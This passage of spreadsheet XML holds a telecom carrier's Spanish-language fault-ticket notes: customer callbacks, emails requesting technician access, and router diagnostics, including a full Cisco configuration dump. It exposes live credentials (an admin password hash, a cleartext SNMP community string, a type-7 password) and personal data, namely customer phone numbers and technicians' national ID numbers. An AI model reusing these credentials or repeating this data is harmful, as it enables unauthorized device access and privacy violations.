FECHA Y HORA LOCALES: 24/05/2022 15:46:55</t>
  </si>
  <si>
    <t>F4576098</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JENNY QUIROZ 32174814 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001010556</t>
  </si>
  <si>
    <t xml:space="preserve"> SE LLAMA AL SR. PEDRO ALVARADO AL 32135579 CONFIRMA QUE EL ROUTER ESTA ENCENDIO, APLICO REINICIO PERO ENLACE NO LEVANTO, SE PRCEDE A SOLICITAR APOYO DE PERSONAL TECNICO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PEDRO ALVARADO 32135579 MENCIONA QUE YA NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS 8:30 HRS
-ID 2001010896</t>
  </si>
  <si>
    <t>F4576102</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ALEJANDRA 47572535 MENCIONA QUE CUANDO PERSONAL ESTE DE NUEVO EN PR VOLVER A LLAMAR PARA AUTORIZAR EL PERMISO
-ID 2001052226 - 2001052646</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEJANDRA 47572535 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001049024 - 2001049218</t>
  </si>
  <si>
    <t>F4576108</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ARTURO FERNANDEZ 87984875 MENCIONA QUE YA ESTAN AUTORIZADOS LOS PERMISOS DE PERSONAL TECNICO
-ID 2001004201</t>
  </si>
  <si>
    <t>F4576114</t>
  </si>
  <si>
    <t>SE LLAMA A ESTEFANI PARA VALIDAR SERVICIO PERO NO RESPONDE.
42019739</t>
  </si>
  <si>
    <t>F4576123</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO PLEITEZ AL 25135037 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001039681
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO PLEITEZ AL 25135037 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001071583
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  FRANCISCO PLEITEZ 25135037  NO RESPONDE, SE INTENTARA LUEGO
-ID 2001143851</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO PLEITEZ 25135037 INDICA QUE ESTA PENDIENTE DE REALIZAR PRUEBAS QUE LAS HARA MAÑANA POR LA MAÑANA Y QUE SE LE LLAME DE 11:00 AM EN ADELANTE PARA CONFIRMAR **
-ID 2001205162
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO PLEITEZ AL 25135037 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001168997
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO PLEITEZ 25135037 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001176518</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO PLEITEZ 25135037 SIGUE SIN RESPONDER
-ID 2001188848</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  FRANCISCO PLEITEZ 25135037  SIGUE SIN RESPONDER, SE INTENTARA LUEGO**
-ID 2001158603
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO PLEITEZ AL 25135037 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001108600
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO PLEITEZ 25135037 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001127559</t>
  </si>
  <si>
    <t>F4576129</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE ANY ZELAYA, INDICA QUE AUN SE TIENE AFECTACION,  SE INTENTA INGRESAR AL CPE , PARA VALIDAR INTERFACES LAN, PERO SOLICITA CAMBIO DE CLAVE Y NO PERMITE ASIGNAR LA QUE SE TIENE ACTUALMENTE, POR LO QUE SE ESTA BUSCANDO FORMA DE INGRESO AL CPE.</t>
  </si>
  <si>
    <t>F4576143</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILMER VELASQUEZ AL 32381535 INDICA QUE ESTA EN SITIO ESPERANDO A LOS TECNICOS **
ID 2001152679
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILMER VELASQUEZ 32381535 MENCIONA QUE YA SE PUEDE PROCEDER CON LA VISITA TECNICA
-ID 2001045962 - 2001046560</t>
  </si>
  <si>
    <t>F4576147</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA A CLIENTE MENCIONA QUE YA ESTAN AUTORIZADOS LOS PERMISOS
CLIENTE SOLICITA QUE AL TENER ALGUN AVANCE SE LE PUEDA NOTIFICAR
-ID 2001066759</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA GESTIONAR LOS PERMISOS DE PERSONAL TECNICO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 25 DE MAYO DE 2022 9:01
PARA: NESTOR.CARRANZA@HIPOTECARIO.COM.SV &lt;NESTOR.CARRANZA@HIPOTECARIO.COM.SV&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;
ASUNTO: SOLICITUD DE PERMISOS || BANCO HIPOTECARIO DE EL SALVADOR || F4576147 || IP2133016SV
BUEN DÍA
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
00815933-2 10805 MANUEL GARCIA
04339969-2 10701 HECTOR IVAN
03236741-2 10807 JOSE LUIS RODRIGUEZ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576166</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. CLAUDIA GONZALEZ / 57455564 INFORMA QUE LA FIBRA OPTICA ESTA DAÑADO, SOLICITA QUE PUEDAN LLEGAR DESPUES DE LA 6PM ATENDERA EN SITIO SR. ERICK GUTIERREZ, SE PROCEDE A SOLICITAR APOYO PARA CERTIFICAR LA FIBRA OPTICA.</t>
  </si>
  <si>
    <t xml:space="preserve">ENLA CE OPERATIVO POR REPARACION SE PORCEDE CON CIERRE DE FALLA POR REPARACION DE CORTE DE FIBRA OPTICA
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
NO SE TIENE GESTION DEL CPE
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN MPLS_INTUR 10.15.62.60
  PING 10.15.62.60: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.15.62.60 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.34.16
DISPLAY IP ROUTING-TABLE VPN-INSTANCE MPLS_INTUR 10.15.62.60
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : MPLS_INTUR
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.15.62.60/32  DIRECT  0    0                 0.0.0.0         VLANIF1606			</t>
  </si>
  <si>
    <t>F4576174</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE ROLAND, INDICA QUE EL REINICO SE DEBE  A QUE SE ELLOS SE LO HAN APLICADO Y CON ELLO EL SERVICIO SE RESTABLECIÓ PERO HA SIDO RECURRENTE,  DESDE HACE 2 MESES, LOS TECNICOS LLEGARON APROXIMENDAMENTE HACE 8 DIAS Y SE MANTUVO ESTABA POR 8 DIAS, PERO HA VUELTO A GENERAR LAS CAIDAS Y CON REINICIAR EL ROUTER DE CLARO SE RESTABLECE, INDICA QUE SE LE BUSQUE SOLUCION AL CASO.
2001057713
COLA:
NOMBRE: A: 55103867
NÚMERO: 55103867
DURACIÓN: 0:06:29
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 55103867
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 25/05/2022 08:51:51</t>
  </si>
  <si>
    <t>LUEGO DE HABER APLICADO CONFIGURACION AL CTC SERVICIO CAE, POR LO QUE SE SOLICITA REINICIO</t>
  </si>
  <si>
    <t>F4576186</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CLIENTE PIDE SE VALIDE SERVICIO MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RUBEN GIRON AL 24161490  CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
ID 2001045486
**</t>
  </si>
  <si>
    <t>CLIENTE RUBEN GIRON 24161490  VALIDA QUE YA SE TIENEN LLAMADAS ENTRANTES Y SALIENTES. SOLICITA SE VALIDE MAÑANA A LAS 8 AM</t>
  </si>
  <si>
    <t>F4576207</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CASTEJON 94412879 MENCIONA QUE YA TOO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001047025</t>
  </si>
  <si>
    <t>F4576214</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GABRIEL PAZ 24127444 RESPONDE UNA SEÑORITA(NO BRINDA NOMBRE) QUIEN TRANSFIERE LA LLAMADA A GABRIEL PAZ PERO ENVIA DIRECTAMENTE A BUZON, SE INTENTARA LUEGO
-ID 2001048175</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GABRIEL PAZ 54820346 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001064314</t>
  </si>
  <si>
    <t>F4576215</t>
  </si>
  <si>
    <t>SE ENVÍAN CORREOS SOLICITANDO ACCESO PARA PERSONAL TECNICO.
DE: OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;ENVIADO: MARTES, 24 DE MAYO DE 2022 18:56PARA: RENE.GRAMAJO@CLARO.COM.SV &lt;RENE.GRAMAJO@CLARO.COM.SV&gt;CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; ZZ_CC_AAA &lt;ZZ_CC_AAA@CLARO.COM.SV&gt;ASUNTO: CERTIFICACION || TECHNOSERVE INC. || ID1028528
BUENAS TARDES,
SE SOLICITA GESTIONAR PERMISO DE ACCESO PARA LA REALIZACIÓN DE LA CERTIFICACIÓN SOLICITADA POR EL CLIENTE, SE ADJUNTA LISTADO DE PERSONAL QUE PUDIERA SER ASIGNADO A LA ATENCIÓN DE LA FALLA POR LO QUE LE SOLICITAMOS INDICAR EL DÍA Y LA HORA A LA QUE EL CLIENTE RECIBIRÁ A PERSONAL DE CLARO, QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
DUI                NOMBRE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05356271-8 KEVIN MEJIA
04271773-2 MIGUEL DUEÑAS
03236741-2 JOSE LUIS RODRIGUEZ
00815933-2 MANUEL GARCIA
04339969-2 HECTOR IVAN URQUILLA VASQUEZ
04271773-2   MIGUEL DUEÑAS
02726611-4 FERNANDO JOSE LINARES
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE DINORA REYES  AL 7862 7679 NO RESPONDE ENVIA A BUZON, SE INTENTARA LUEGO PARA CONFIRMAR ACCESOS**
ID 2001042975
**</t>
  </si>
  <si>
    <t>****SE LLAMA  A CLIENTE DINORA REYES  AL 7862 7679 INDICA QUE YA SE PUEDE PRESENTAR EL PERSONAL TECNICO Y QUE PREGUNTEN POR EL SEÑOR JORGE CAÑA QUE ESTARA ATENDIENDO **
ID 2001067829
**</t>
  </si>
  <si>
    <t>F4576225</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BEATRIZ HERNANDEZ 97019269 MENCIONA QUE YA LE LLAMARON Y LE INDICARON QUE ENVIARAN VISITA TECNICA
-ID 2001050923</t>
  </si>
  <si>
    <t>&lt;CSPSHNR2N1D1EIM1&gt;PING -VPN-INSTANCE CREDISOL 10.2.125.134
  PING 10.2.125.134: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.2.125.134: BYTES=56 SEQUENCE=1 TTL=255 TIME=2 MS
    REPLY FROM 10.2.125.134: BYTES=56 SEQUENCE=2 TTL=255 TIME=2 MS
    REPLY FROM 10.2.125.134: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.2.125.134: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.2.125.134: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.2.125.134 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
&lt;CSPSHNR2N1D1EIM1&gt;TELNE VPN-INSTANCE CREDISOL 10.2.125.134
TRYING 10.2.125.134 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.2.125.134 ...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USER ACCESS VERIFICATION
USERNAME: GESTINIP
PASSWORD:
% LOGIN INVALID
USERNAME: CLARO
PASSWORD:
1363023_CSC891_CREDISOL_PLAZA-SOL_SAN04_DT4M#
1363023_CSC891_CREDISOL_PLAZA-SOL_SAN04_DT4M#
1363023_CSC891_CREDISOL_PLAZA-SOL_SAN04_DT4M#
1363023_CSC891_CREDISOL_PLAZA-SOL_SAN04_DT4M#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4295 BYTES
!
VERSION 15.3
SERVICE TCP-KEEPALIVES-IN
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME 1363023_CSC891_CREDISOL_PLAZA-SOL_SAN04_DT4M
!
BOOT-START-MARKER
BOOT-END-MARKER
!
AQM-REGISTER-FNF
!
!
NO AAA NEW-MODEL
!
!
!
!
!
!
!
IP DHCP EXCLUDED-ADDRESS 192.168.13.1 192.168.13.99
IP DHCP EXCLUDED-ADDRESS 192.168.13.201 192.168.13.254
!
IP DHCP POOL POOL
 NETWORK 192.168.13.0 255.255.255.0
 DEFAULT-ROUTER 192.168.13.1
 DNS-SERVER 10.16.10.16 8.8.8.8
 LEASE 0 0 20
!
!
!
IP CEF
NO IPV6 CEF
!
!
!
!
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
!
!
!
!
LICENSE UDI PID C891F-K9 SN FJC2230L19Z
!
!
USERNAME CLARO PRIVILEGE 15 SECRET 5 $1$X621$SUMXMKMKZRA/2A21JZ0XU0
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
INTERFACE BRI0
 NO IP ADDRESS
 ENCAPSULATION HDLC
 SHUTDOWN
 ISDN TERMINATION MULTIDROP
!
INTERFACE FASTETHERNET0
 DESCRIPTION BACKUP LINK
 NO IP ADDRESS
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE FASTETHERNET0.3650
 DESCRIPTION WAN_ BKP
 ENCAPSULATION DOT1Q 3650
 IP ADDRESS 10.2.126.22 255.255.255.252
 RATE-LIMIT INPUT 7168000 1344000 2688000 CONFORM-ACTION CONTINUE EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 7168000 1344000 2688000 CONFORM-ACTION CONTINUE EXCEED-ACTION DROP
 IP OSPF NETWORK POINT-TO-POINT
 IP OSPF MTU-IGNORE
 IP OSPF 200 AREA 0
 IP OSPF COST 6000
!
INTERFACE GIGABITETHERNET0
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET1
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET2
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET3
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET4
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET5
 NO IP ADDRESS
 LOAD-INTERVAL 30
!
INTERFACE GIGABITETHERNET6
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET7
 NO IP ADDRESS
 DUPLEX FULL
 SPEED 1000
!
INTERFACE GIGABITETHERNET8
 NO IP ADDRESS
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET8.2153
 DESCRIPTION GESTION_PPL
 ENCAPSULATION DOT1Q 2153
 IP ADDRESS 10.82.25.13 255.255.255.192
!
INTERFACE GIGABITETHERNET8.3645
 DESCRIPTION WAN_PPL
 ENCAPSULATION DOT1Q 3645
 IP ADDRESS 10.2.125.134 255.255.255.252
 RATE-LIMIT INPUT 7168000 1344000 2688000 CONFORM-ACTION CONTINUE EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 7168000 1344000 2688000 CONFORM-ACTION CONTINUE EXCEED-ACTION DROP
 IP OSPF NETWORK POINT-TO-POINT
 IP OSPF MTU-IGNORE
!
INTERFACE VLAN1
 DESCRIPTION LAN
 IP ADDRESS 192.168.13.1 255.255.255.0
 IP FLOW INGRESS
 IP FLOW EGRESS
 LOAD-INTERVAL 30
!
INTERFACE ASYNC3
 NO IP ADDRESS
 ENCAPSULATION SLIP
!
ROUTER OSPF 200
 NETWORK 192.168.13.0 0.0.0.255 AREA 0
 DISTANCE 200
!
ROUTER OSPF 100
 ROUTER-ID 10.2.125.134
 DOMAIN-TAG 14754
 PASSIVE-INTERFACE VLAN1
 NETWORK 10.2.125.132 0.0.0.3 AREA 0
 NETWORK 192.168.13.0 0.0.0.255 AREA 0
 DEFAULT-METRIC 255
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP FLOW-TOP-TALKERS
 TOP 10
 SORT-BY BYTES
 CACHE-TIMEOUT 100
!
IP ROUTE 10.31.210.16 255.255.255.248 10.82.25.1 NAME SS_GT
IP ROUTE 10.33.2.0 255.255.255.0 10.82.25.1 NAME GESTION_SOLAR
IP ROUTE 10.195.4.79 255.255.255.255 10.82.25.1 NAME GESTION_TGU
IP ROUTE 10.195.14.47 255.255.255.255 10.82.25.1 NAME GESTION_SPS
!
!
IP PREFIX-LIST DEFAULT_ROUTE_OSPF SEQ 5 PERMIT 0.0.0.0/0
IP PREFIX-LIST DEFAULT_ROUTE_OSPF SEQ 10 DENY 192.168.13.0/24
!
ROUTE-MAP DEFAULT_ROUTE_OSPF DENY 10
 MATCH IP ADDRESS PREFIX-LIST DEFAULT_ROUTE_OSPF
!
SNMP-SERVER COMMUNITY G3$T10NH0DUR@$ RO
ACCESS-LIST 1 DENY   ANY
ACCESS-LIST 1 PERMIT 192.168.13.0 0.0.0.255
!
CONTROL-PLANE
!
!
!
MGCP BEHAVIOR RSIP-RANGE TGCP-ONLY
MGCP BEHAVIOR COMEDIA-ROLE NONE
MGCP BEHAVIOR COMEDIA-CHECK-MEDIA-SRC DISABLE
MGCP BEHAVIOR COMEDIA-SDP-FORCE DISABLE
!
MGCP PROFILE DEFAULT
!
!
!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C
!
LINE CON 0
 PASSWORD 7 051D031C151F1D3B30215C330700
 LOGIN
 NO MODEM ENABLE
LINE AUX 0
LINE 3
 MODEM INOUT
 SPEED 115200
 FLOWCONTROL HARDWARE
LINE VTY 0 4
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
!
END
1363023_CSC891_CREDISOL_PLAZA-SOL_SAN04_DT4M#  SHO VER
CISCO IOS SOFTWARE, C800 SOFTWARE (C800-UNIVERSALK9-M), VERSION 15.3(3)M6, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2015 BY CISCO SYSTEMS, INC.
COMPILED TUE 04-AUG-15 05:50 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.4(1R)T1, RELEASE SOFTWARE (FC1)
1363023_CSC891_CREDISOL_PLAZA-SOL_SAN04_DT4M UPTIME IS 52 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "FLASH:C800-UNIVERSALK9-MZ.SPA.153-3.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K9 (REVISION 1.0) WITH 488524K/35763K BYTES OF MEMORY.
PROCESSOR BOARD ID FJC2230L19Z
1 FASTETHERNET INTERFACE
9 GIGABIT ETHERNET INTERFACES
1 SERIAL INTERFACE
1 ISDN BASIC RATE INTERFACE
1 TERMINAL LINE
1 VIRTUAL PRIVATE NETWORK (VPN) MODULE
DRAM CONFIGURATION IS 32 BITS WIDE
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
250880K BYTES OF ATA SYSTEM COMPACTFLASH (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#   PID                   SN
-------------------------------------------------
*0        C891F-K9              FJC2230L19Z
LICENSE INFORMATION FOR 'C800'
    LICENSE LEVEL: ADVIPSERVICES   TYPE: PERMANENT
    NEXT REBOOT LICENSE LEVEL: ADVIPSERVICES
CONFIGURATION REGISTER IS 0X2102
1363023_CSC891_CREDISOL_PLAZA-SOL_SAN04_DT4M#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.2.125.133           11   084F.0AC8.65E0  ARPA   GIGABITETHERNET8.3645
INTERNET  10.2.125.134            -   780C.F009.DDCE  ARPA   GIGABITETHERNET8.3645
INTERNET  10.2.126.21            15   084F.0AC8.6590  ARPA   FASTETHERNET0.3650
INTERNET  10.2.126.22             -   780C.F009.DDC6  ARPA   FASTETHERNET0.3650
INTERNET  10.82.25.1              0   0000.5E00.0106  ARPA   GIGABITETHERNET8.2153
INTERNET  10.82.25.13             -   780C.F009.DDCE  ARPA   GIGABITETHERNET8.2153
INTERNET  10.82.25.61             0   084F.0AC8.6570  ARPA   GIGABITETHERNET8.2153
INTERNET  10.82.25.62             1   084F.0AC8.65E0  ARPA   GIGABITETHERNET8.2153
INTERNET  192.168.13.1            -   780C.F009.DDBC  ARPA   VLAN1
INTERNET  192.168.13.2            0   INCOMPLETE      ARPA
INTERNET  192.168.13.3            0   0017.6110.0D0B  ARPA   VLAN1
INTERNET  192.168.13.20           0   0017.C849.7769  ARPA   VLAN1
INTERNET  192.168.13.25          15   6827.1988.A2F2  ARPA   VLAN1
INTERNET  192.168.13.100         11   484D.7EBC.0513  ARPA   VLAN1
INTERNET  192.168.13.101          0   C074.AD31.BBC3  ARPA   VLAN1
INTERNET  192.168.13.102          9   484D.7EBA.FE14  ARPA   VLAN1
INTERNET  192.168.13.103          1   C074.AD31.BBCC  ARPA   VLAN1
INTERNET  192.168.13.104         11   484D.7EC3.DEF1  ARPA   VLAN1
INTERNET  192.168.13.105          0   484D.7EBB.FE63  ARPA   VLAN1
INTERNET  192.168.13.107          0   704C.A59D.F0A4  ARPA   VLAN1
1363023_CSC891_CREDISOL_PLAZA-SOL_SAN04_DT4M#SHO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UP                    UP
FASTETHERNET0.3650         10.2.126.22     YES NVRAM  UP                    UP
GIGABITETHERNET0           UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET1           UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET2           UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET3           UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET4           UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET5           UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET6           UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET7           UNASSIGNED      YES UNSET  UP                    UP
GIGABITETHERNET8           UNASSIGNED      YES NVRAM  UP                    UP
GIGABITETHERNET8.2153      10.82.25.13     YES NVRAM  UP                    UP
GIGABITETHERNET8.3645      10.2.125.134    YES NVRAM  UP                    UP
VLAN1                      192.168.13.1    YES NVRAM  UP                    UP
1363023_CSC891_CREDISOL_PLAZA-SOL_SAN04_DT4M#SHO INTER SMMB?
% UNRECOGNIZED COMMAND
1363023_CSC891_CREDISOL_PLAZA-SOL_SAN04_DT4M#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 FASTETHERNET0                 0         0         0         0         0         0         0         0         0
* FASTETHERNET0.3650            -         -         -         -         -         -         -         -         -
  GIGABITETHERNET0              0         0         0         0         0         0         0         0         0
  GIGABITETHERNET1              0         0         0         0         0         0         0         0         0
  GIGABITETHERNET2              0         0         0         0         0         0         0         0         0
  GIGABITETHERNET3              0         0         0         0         0         0         0         0         0
  GIGABITETHERNET4              0         0         0         0         0         0         0         0         0
  GIGABITETHERNET5              0         0         0         0         0         0         0         0         0
  GIGABITETHERNET6              0         0         0         0         0         0         0         0         0
* GIGABITETHERNET7              0         0         0         0    129000        59    443000        61         0
* GIGABITETHERNET8              0         0         0        94    130000        44    104000        48         0
* GIGABITETHERNET8.2153         -         -         -         -         -         -         -         -         -
* GIGABITETHERNET8.3645         -         -         -         -         -         -         -         -         -
* VLAN1                         0         0         0         0    101000        46    125000        42         0
NOTE:NO SEPARATE COUNTERS ARE MAINTAINED FOR SUBINTERFACES
     HENCE DETAILS OF SUBINTERFACE ARE NOT SHOWN
1363023_CSC891_CREDISOL_PLAZA-SOL_SAN04_DT4M#</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA NOTIFICAR VISITA TECNICA</t>
  </si>
  <si>
    <t>F4576226</t>
  </si>
  <si>
    <t>SE NOTIFICA ENLACE ALARMADO EN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6226
ID: 38300513T
IDENTIFICADOR DEL CLIENTE: CC_CAMPERO_GT_INTERNET_C634
UBICADO EN:  INTERNET_634, CALZADA SANTA LUCÍA FINCA LA PÓLVORA ANTIGUA GUATEMALA (CERCA DEL MERCADO). 14.5571666
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4576228</t>
  </si>
  <si>
    <t>***--- TOMAR EN CUENTA COMENTARIO DE CC ANTERIOR ---*
 24/05/2022 23:02:59 GUATEMALA/CENTRO AMERICA (EDY BENJAMIN BENITO BATZ):
SE LE LLAMA A CLIENTE 56083636 ELMER, INDICA QUE ARRIBA DE RESTAURANTE LA ANTENA ESTA CAIDA POR EL FUERTE VIENTO,  YA REALIZO LAS PRUEBAS DE PRIMER NIVEL Y EL SERVICIO CONTINUA CAIDO, SE NOTIFICA A RAULE.ALVAREZ VIA SKLYPE PARA EL SEGUIMIENTO</t>
  </si>
  <si>
    <t>SE LLAMA A WALTER REYES 45787911  MENCIONA QUE YA OBSERVA EL SERVICIO OPERATIVO
-ID 2001131506</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL INDICANDO AVANCES --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MIÉRCOLES, 25 DE MAYO DE 2022 01:24
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
CC: HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; MESA DE SERVICIO TI &lt;MESADESERVICIOTI@SOMOSCMI.COM&gt;
ASUNTO: RE: C634 - CAIDO, ENLACE DE DATOS CLARO 38300513, 671900172
BUENOS DÍAS ESTIMADO SR. REYES.
                ACTUALMENTE EL SERVICIO SE ENCUENTRA RESTABLECIDO SIN EMBARGO SE TIENEN TIEMPOS ALTOS, PERSONAL A CARGO NOS INDICA QUE SE CONTINUARÁ EL SEGUIMIENTO A PRIMERA HORA CON EL PERSONAL DEL PUNTO REMOTO.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4576244</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUAN ROMERO AL 86421627 SIGUE SIN RESPONDER,  ENVIA DIRECTO A BUZON || SE INTENTARA LUEGO **
ID 2001109332 - 2001109474
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUAN ROMERO AL 86421627 NO RESPONDE,  ENVIA DIRECTO A BUZON || SE INTENTARA LUEGO **
ID 2001070672
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUAN ROMERO AL 86421627 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001040793
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUAN ROMERO AL 86421627  CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001156572
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUAN ROMERO AL 86421627 SIGUE SIN RESPONDER,  ENVIA DIRECTO A BUZON || SE INTENTARA LUEGO **
ID 2001132748
**</t>
  </si>
  <si>
    <t>F4576266</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KEILY MEHOLA YOC RAMIREZ AL 31751873 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001062120
**</t>
  </si>
  <si>
